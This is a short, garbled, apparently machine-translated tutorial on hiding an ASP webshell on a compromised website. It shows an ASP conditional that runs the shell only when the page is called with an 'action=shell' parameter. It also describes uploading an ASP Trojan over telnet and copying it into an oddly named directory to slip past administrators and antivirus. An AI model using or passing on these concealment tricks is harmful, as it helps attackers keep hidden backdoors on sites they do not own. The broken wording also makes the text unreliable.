Get website the webshell, if the administrator found, then your horse is useless, deleted!
So we have to hide our SHELL,administrators are also not exists eat!
- Here's a dish method, the ASP insertion method, not easy to be found~
In our to tricks of the ASP file added the following contents
<% if request("action")="ok" then %>
<% end if %>
In*****added at your shell code
It is Oh G A
Access when you do the hands and feet of the ASP files back plus? action=shell, for example:index. asp? action=shell
You can tune out the webshell, does not affect the normal browser embrace
- There is a method
The premise is to give system permissions,
Successful telnet after,Upload a asp Trojan
Into the site directory
The last is the next layer.
copy 1. asp s.../
OK,so antivirus software will engage within the
Anti asked when http://your/ meat is meat/s.../1. asp